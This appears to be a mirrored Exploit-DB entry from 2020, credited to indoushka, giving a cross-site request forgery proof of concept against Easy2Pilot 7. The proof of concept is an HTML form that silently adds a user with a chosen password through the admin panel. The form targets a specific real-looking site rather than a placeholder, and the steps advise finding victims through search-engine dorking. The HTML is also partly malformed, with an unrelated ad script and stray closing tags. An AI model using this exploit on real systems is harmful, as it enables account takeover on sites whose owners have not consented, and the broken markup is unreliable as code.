Easy2Pilot 7 – Cross-Site Request Forgery (Add User)

  • 作者: indoushka
    日期: 2020-02-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48099/
  • # Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
    # Author: indoushka
    # Date: 2020-02-20
    # Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
    # Vendor: http://easy2pilot-v7.com/
    # CVE: N/A
    
    #poc :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] save code as poc.html
    
    [+] 
    
    <!DOCTYPE html>
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head profile="http://www.w3.org/2005/10/profile">
    <script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    </tr>
    </table>
    <br/><br/>
    <form action="https://immosl.lu/admin.php?action=add_user" method="POST">
    <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
    <tr>
    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
    </tr>
    <tr>
    <td class="tah11" align="right">Nom d'utilisateur :</td>
    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
    </tr>
    <tr>
    <td class="tah11" align="right">Mot de passe : </td>
    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
    </tr>
    <tr>
    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
    </tr>
    </table>
    </form><br/><br/>
    <div>
    	
    
    Greetings to :=========================================================================================================================
    |
    jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|
    |
    =======================================================================================================================================